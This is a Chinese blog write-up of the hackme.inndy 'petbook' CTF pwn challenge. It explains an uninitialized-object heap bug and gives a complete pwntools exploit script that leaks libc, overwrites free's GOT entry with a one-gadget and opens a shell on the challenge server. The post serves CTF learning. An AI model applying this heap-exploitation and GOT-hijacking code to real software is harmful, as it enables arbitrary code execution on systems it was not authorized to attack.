hackme inndy petbook writeup

最新推荐文章于 2022-01-27 21:00:00 发布
最新推荐文章于 2022-01-27 21:00:00 发布
阅读量442 收藏
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/charlie_heng/article/details/79330805
版权

这题一直没人做,感觉好像很难,其实是自己吓倒自己

这题的漏洞其实很明显,就是没有初始化对象,所以可以控制新new出来的user的pet的地址和post的地址

这里说下怎么控制

·1. new一个比一个user大,即大于536字节的post
2. edit这个post,将这个post弄成更大的,这个时候realloc会把原来的堆给free掉,然后再new一个新的堆
3. 这个时候再new一个user,因为给realloc那个堆是大于536字节的,是unsorted bin,然后这个时候new user的话会将这个堆分割一部分给user,只要在new那个post的时候往对应地方填上想填的东西就可以控制了

这里可以控制pet和post,但是因为post想打印内容的时候要检查magic,我们又没有泄漏magic,所以这里控制pet的地址

因为控制了pet,所以可以任意写和任意读

方法如下
1. 先new一个user,按照上面方法,new 一个post,edit这个post,将pet的地址指向userdb
2. 这个时候new一个user,打印信息的时候可以打印出堆里面的一个地址
3. 以这个堆地址为基准,用gdb看下新new出来的post的地址与这个地址的偏移,这个时候在post里面弄一个fake pet,然后新new user的时候地址指向这个post,因为fake pet我们可以控制,所以这个时候就可以进行任意读
4. 借任意读先读出magic和libc函数的地址
5. 然后这个时候可以用magic来构造一个通过检测的pet,可以进行任意写,然后用one gadgets填到free那里,然后abandon pet,get到shell

payload如下

from pwn import *

debug=0
if debug:
    p=process('./petbook')
    context.log_level='debug'
    gdb.attach(proc.pidof(p)[0])
    e=ELF('/lib/x86_64-linux-gnu/libc-2.24.so')
    one_gadget=0x3f2d6
else:
    context.log_level='debug'
    p=remote('hackme.inndy.tw', 7710)
    e=ELF('./libc.so')
    one_gadget=0x45206

def se(x):
    p.sendline(x)

def ru(x):
    p.recvuntil(x)

def reg(name,pwd,line=True):
    se('1')
    ru('Username >>')
    if line:
        se(name)
    else:
        p.send(name)
    ru('Password >>')
    se(pwd)
    ru('>>')

def login(name,pwd):
    se('2')
    ru('>>')
    se(name)
    ru('>>')
    se(pwd)
    p.recvuntil('Have Pet: ')
    if p.recv(1)=='Y':
        ru('Name: ')
        name_data=p.recvuntil('\n')[:-1]
        p.recvuntil('Type: ')
        type_data=p.recvuntil('\n')[:-1]
        ru('>>')
        return name_data,type_data
    ru('>>')

def logout():
    se('0')
    ru('>>')

def new_post(title,length,content):
    se('1')
    ru('Title >>')
    se(title)
    ru('Length >>')
    se(str(length))
    ru('Content >>')
    se(content)
    ru('>>')

def edit_post(id,title,length,content):
    se('3')
    ru('id >>')
    se(str(id))
    ru('title >>')
    se(title)
    ru('size >>')
    se(str(length))
    ru('Content >>')
    se(content)
    ru('>>')


def pet_adopt(name):
    se('5')
    ru('Name')
    se(name)
    ru('>>')

def pet_rename(name):
    se('6')
    ru('>>')
    se(name)
    ru('>>')

def pet_abandon():
    se('7')

def admin_info():
    se('999')



reg('u1','u1')
login('u1','u1')
new_post('1',700,'a'*520+p64(0x603158-16))
edit_post(2,'1',1500,'a')
logout()


reg('u2','u2')
heap=login('u2','u2')
heap=u32(heap[1]+'\x00'*(4-len(heap[1])))

fake_pet=p64(0xdeadbeef)+p64(0x603164)+p64(0x603038)
pet_offset=0xf30

new_post('2',700,'a'*520+p64(heap+pet_offset))
new_post('3',700,fake_pet)
edit_post(4,'1',1500,'b')
logout()

reg('u3','u3')
data=login('u3','u3')
magic=data[0]
libc=data[1]

magic=u32(magic)
base=u64(libc+'\x00\x00')-e.symbols['puts']

fake_pet2=p64(magic+0x300000000)+p64(0x603018)+p64(0x603018)
pet_offset2=0xd80

new_post('4',700,'c'*520+p64(heap+pet_offset2))
new_post('5',60,fake_pet2)
edit_post(7,'2',1500,'c')
logout()

reg('u4','u4')
login('u4','u4')

pet_rename(p64(base+one_gadget)[:-1])
pet_abandon()

p.interactive()
charlie_heng
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Hackme Writeup
wywwzjj
05-21 1万+
https://wywwzjj.top/2019/02/02/Hackme-Writeup/ hide and seek Can you see me? I’m so close to you but you can’t see me. 这题查看源码即可。 guestbook This guestbook sucks. sqlmap is your friend. 既然提示有 sqlmap...
hackme.inndy.tw的一些Writeup(5月30更新)
热门推荐
baikeng3674的博客
10-21 2万+
hackme.inndy.tw的一些Writeup(6月3日更新) 原文链接:http://www.cnblogs.com/WangAoBo/p/7706719.html 推荐一下https://hackme.inndy.tw/scoreboard/,上边有一些很好的针对新手的题目,但网上能搜到的Writeup很少,因此开了这篇博文记录一下部分目前解出的题目(主要是pwn和r...
hackme inndy pwn tictactoe writeup
charlie_heng的专栏
01-03 540
昨天立的果然是个flag。。。。还是忍不住做了 这题ai其实很容易破,有个任意内存写,直接写到胜利就可以了 但是怎么get shell呢? 看了下,发现初始化的时候把一段地址设为可写了,那段地址存的是DT_SYMTAB之类的地址,所以很明显,这题是ret2dlresolve,那么怎么改呢? 最快的方法是改DT_STRTAB,当执行到memset的时候,把它的字符串变为system,然后再将...
hackme inndy pwn raas writeup
charlie_heng的专栏
12-31 367
继续做题,之前一直对堆不是很熟,这次特地做一道堆的题来练手 首先题目给了提示,是一道UAF 可以看到,有3个操作,一个是新建,一个是删除,一个是展示 删除和展示如上,新建的代码太长,我就简述下功能吧 1.选择类型,数字还是字符串 2.如果是字符串,要输入长度 3.输入内容 内存的操作是,先new了一个大小为12的堆,前8位放的是用于展示的函数指针和用于删除的函数指针 如...
hackme的web部分水题writeup集合
cggwz的信息飞船
10-31 439
简单介绍,hackme是提供ctf基础题的一个很好的网站,网站链接如下: 网站链接 这次把web部分的头几个没什么值得说的题说一下,因为太短了,单独发一篇博客不值得。 hide and seek 几乎每个平台都有这道题,直接右击查看源代码即可看到flag。目的就是教会我们查看网页源代码。应平台要求,flag就不提供了。 scoreboard 网页源代码里是没有的,也没有很多的提示,那么只能说flag在服务器端或者在数据包里,起码不在客户端。scoreboard页面可以和服务器端沟通的只有登录按钮和提交fla
Petbook
02-18
Petbook Lenguajes y herramientas: Própositodel proyecto Desarrollar没有红色的社会使用许可,没有任何使用权的社区,有经验的人相互间的关系,quienes的儿子amante吉祥物,有的有其他人的关系。 功能科 ●...
Petbook-Frontend:这是一种社交媒体,适合希望通过宠物上传照片的人
02-13
Petbook前端项目详解】 Petbook-Frontend 是一个专为宠物爱好者设计的社交媒体平台,用户可以在这里分享他们心爱宠物的照片,与同样喜欢宠物的朋友交流互动。该项目以JavaScript为主要编程语言,为用户提供了一个...
Group1Repo
03-17
组1成员 1)Nishan Karki(nk577)(Group1的负责人) 技能:Python,C ++,R,SQL,Django,... 它称为PetBook。 进行此项目的主要目的是帮助人们了解其他人关于宠物的信息。 强烈建议用户撰写仅与宠物有关的主题。
hackme inndy pwn leave_msg writeup
charlie_heng的专栏
01-01 407
感觉有点做题做上瘾了。。。。。 拿到程序,首先checksec看下开了什么保护,发现没开nx,但是开了栈溢出检测,然后又有堆,明显是把shellcode放堆里面去执行 然后看了下,下标检查那里可以加个空格绕过,可以修改got表里面的函数为堆的值,调用函数的时候就会执行堆里面的shellcode 但是这里有一个长度判断,大于8就会截断,放不了一般的shellcode 这里绕过就比较骚了,首先...
hackme inndy reverse rc87cipher writeup
charlie_heng的专栏
02-01 572
话说这题真的挺难折腾出来的 首先这个程序是有upx壳的 但是这个壳被魔改了,关键的信息都被删除了,在google搜了半天linux upx upack 都找不到什么有用的信息 有两条路,一条是修复关键信息,一条路是像windows那些程序那样手动脱壳脱下来 两条路其实都试了一下,不过最终行得通的是第二条路 这里说下第一条路,如果你们有兴趣的话,可以去试试 首先作者把0xB4~0xB7处...
hackme inndy pwn veryoverflow writeup
charlie_heng的专栏
01-02 555
这次是最后一题了,做完这题一定要去复习!!!!(立了个flag。。。 这题有两种思路做,第一种是return2dl_resolve 第二种是泄漏libc,rop运行system(‘/bin/sh’) 因为想完美一点,所以一开始写的是第一种,写完了,在本地get到shell了,连到服务器,结果不行,一看,栈的地址开头是ff,这个也代表eof。。。不吐槽了,现在来分别说下两种思路是怎么做的 其...
hackme inndy pwn echo2 writeup
charlie_heng的专栏
12-30 855
这题做了好久。。。但是学到了很多很骚的思路 做完echo1 ,然后看了下echo2,本来以为只是简单的从32位变成64位,但是发现坑贼多。。。。 首先,用checksec看了下,发现开了pie。。。那就不能简单的改got表,还要用格式化字符串漏洞来泄漏出一个指向程序本身的指针 第二,因为是64位系统,所以一个地址是8个字节,但是这里实际只有6个字节是有内容的,有两个字节是00,所以就不能用p...
[BUUCTF-pwn] inndy_petbook
weixin_52640415的博客
01-27 657
写着写着自己都乱了。 菜单很长,块也很大看起来极不方便。 先是建用户和登录这个没啥,然后就是post,每个post会有一个管理块。整理一下大概关系是这样的: 用户块0x220->0x20->0x120->post信息,其中用户块没有溢出,但post有realloc修改,好像就这一个漏洞点。 另外每个头上加了migic:2字节序号+2字节校验。这个可以泄露但如果序号在0x100以下会被截断,所以要先建256块再泄露。 主要思路: 建用户登录 建255个小块(用户也占用块序号)将块
hackme inndy reverse mov writeup
charlie_heng的专栏
01-30 903
MOV instruction is turing complete! mov是图灵完备的! 说真的,第一次看到这题的时候感觉真的完全震惊。。。一大堆mov,还以为是把代码写到一个地方,之后跳到那里,但是debug的时候并没有。。。 然后过了一阵子,在油管上无意中看到一个视频,讲的是怎么只用mov来写程序的。。。。然后想起这题。。。 看完那个视频之后,油管又推了一个怎么解这种movfusc...
hackme inndy pwn stack writeup
charlie_heng的专栏
01-02 481
这题看起来很恐怖,所有保护都开了,但是其实并没有想象中难 这题先pop 两次,再push回去一个,然后再push下标,就可以直接绕过canary,把ret的地址给leak出来 再减去libc里面的__libc_start_main偏移,再把低三位给清零就得到libc基址 之后就是常规rop了,这里直接执行system(‘/bin/sh’) 下面就是利用的代码 from pwn imp...
hackme(web wp)
Xi4or0uji
09-06 4283
oj说了不要直接给flag,所以就只写思路啦~ hide and seek 源码就有了 Guestbook 这题是SQL注入 看数据库 ?mod=read&id=-1 union select 1,2,database(),4# 然后就看到数据库是g8 表 ?mod=read&id=-1 union select 1,2,(select table_name fr...
echo和echo2的wp
一个码农的笔记
11-12 5673
https://hackme.inndy.tw/scoreboard/ 题目很有趣,我做了rop和rop2这两个题目感觉还不错,我把wp分享出来,方便大家学习 echo的要求是 nc hackme.inndy.tw 7711 Tips: format string vulnerability这个题目提示了是格式化字符串漏洞,所以先了解一下啥是格式化漏洞,参考 http://www.freeb
hackme.inndy.tw raas 经验总结
qq_43189757的博客
08-05 211
相关资料: Glibc内存管理 如果有人看我的总结的话直接看资料就行了,堆之类的我也刚接触,不怎么熟悉 UAF漏洞原理是 在释放较小的堆块的时候不会立马把这个堆块放到small bins 当中,而会把这个堆块放到fast bins当中, 当需要再次分配堆块的时候会优先再 fast bins寻找合适的堆块,找到了则返回,如果没找到才会去small bins中寻找空闲的堆块。利用这个特性可以造成堆块重...
hackme.inndy.tw - pyyy
weixin_30776545的博客
04-01 138
0x01 反编译 1.第一次尝试的时候我直接在线反编译,部分结果如下。 for (i, f) in enumerate(F): n = pow(f, m, g) this_is = 'Y-Combinator' l = (lambda f: ((lambda x: x(x)),)((lambda y: (f,)((lambda : y(y)(*args)))...
Webhacking.kr writeup(更新至challenge 29)
Bendawang's Blog
04-14 4685
Webhacking.kr writeup
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值